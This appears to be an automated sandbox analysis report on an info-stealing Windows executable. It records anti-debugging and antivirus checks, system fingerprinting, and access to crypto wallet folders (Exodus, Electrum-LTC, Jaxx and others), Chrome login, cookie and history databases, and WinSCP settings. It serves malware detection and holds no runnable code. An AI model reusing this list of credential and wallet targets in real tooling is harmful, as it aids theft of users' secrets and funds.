Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0042A36A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0042A36A
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00424430 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00424430
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0041F170 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear, 0_2_0041F170
Source: C:\Users\user\Desktop\06625899.exe Memory protected: page guard
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0042A36A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0042A36A
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0043139E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0043139E
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00435F17 SetUnhandledExceptionFilter, 0_2_00435F17
Source: C:\Users\user\Desktop\06625899.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\06625899.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\06625899.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\06625899.exe Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree, 0_2_0041EE70
Source: C:\Users\user\Desktop\06625899.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 0_2_00438131
Source: C:\Users\user\Desktop\06625899.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 0_2_004381F1
Source: C:\Users\user\Desktop\06625899.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 0_2_00438258
Source: C:\Users\user\Desktop\06625899.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 0_2_00438294
Source: C:\Users\user\Desktop\06625899.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 0_2_00437597
Source: C:\Users\user\Desktop\06625899.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 0_2_004366D3
Source: C:\Users\user\Desktop\06625899.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 0_2_0042E77A
Source: C:\Users\user\Desktop\06625899.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 0_2_00437885
Source: C:\Users\user\Desktop\06625899.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_0043693B
Source: C:\Users\user\Desktop\06625899.exe Code function: GetLocaleInfoA, 0_2_00430A1A
Source: C:\Users\user\Desktop\06625899.exe Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 0_2_0043AB62
Source: C:\Users\user\Desktop\06625899.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_0043AC3C
Source: C:\Users\user\Desktop\06625899.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_00437D69
Source: C:\Users\user\Desktop\06625899.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 0_2_00437E5E
Source: C:\Users\user\Desktop\06625899.exe Code function: GetLocaleInfoA,wsprintfA,_memset,LocalFree, 0_2_0041EED8
Source: C:\Users\user\Desktop\06625899.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 0_2_00437F60
Source: C:\Users\user\Desktop\06625899.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 0_2_00437F05
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00401090 cpuid 0_2_00401090
Source: C:\Users\user\Desktop\06625899.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\06625899.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\06625899.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00420120 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime, 0_2_00420120
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00420120 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime, 0_2_00420120
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0041EDD0 GetUserNameA, 0_2_0041EDD0
Source: C:\Users\user\Desktop\06625899.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: 06625899.exe, 00000000.00000002.413121737.00000000031BF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Windows Defender\MsMpeng.exe
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Source: Yara match File source: 0.2.06625899.exe.2320e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.06625899.exe.2320e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.06625899.exe.2380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.06625899.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.06625899.exe.2380000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.06625899.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\?
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\?
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\06625899.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: 06625899.exe String found in binary or memory: \Electrum\wallets\
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets\?*U/
Source: 06625899.exe String found in binary or memory: \Electrum\wallets\
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: 06625899.exe String found in binary or memory: \Exodus\backups
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: 06625899.exe String found in binary or memory: Exodus Web3 Wallet
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum"
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default_wallet
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: file__0.localstorage
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\MultiDoge\?}
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: Yara match File source: 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 0.2.06625899.exe.2320e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.06625899.exe.2320e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.06625899.exe.2380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.06625899.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.06625899.exe.2380000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.06625899.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR